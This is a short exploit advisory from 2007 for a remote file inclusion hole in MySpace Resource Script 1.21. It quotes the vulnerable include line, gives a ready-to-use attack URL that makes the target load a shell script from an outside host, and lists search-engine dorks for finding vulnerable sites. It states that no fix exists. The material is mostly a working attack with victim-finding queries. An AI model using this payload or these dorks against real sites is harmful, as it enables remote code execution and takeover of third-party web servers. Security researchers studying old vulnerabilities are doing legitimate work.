MySpace Resource Script (MSRS) 1.21 RFI Vulnerability

2007-10-29 00:00:00

MSRS v.1.21 Remote File Inclusion

Author Site : http://www.myspacepros.com/

POC :

/_theme/breadcrumb.php Line No. 3

<?php include($rootBase . '/_inc/breadcrumb.php'); ?>

Usage : http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?

D0rks :

inurl:/Generators/Layout_Generator
"!new Female Celebrities"
inurl:/Generators/Scrollbar_Colors

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.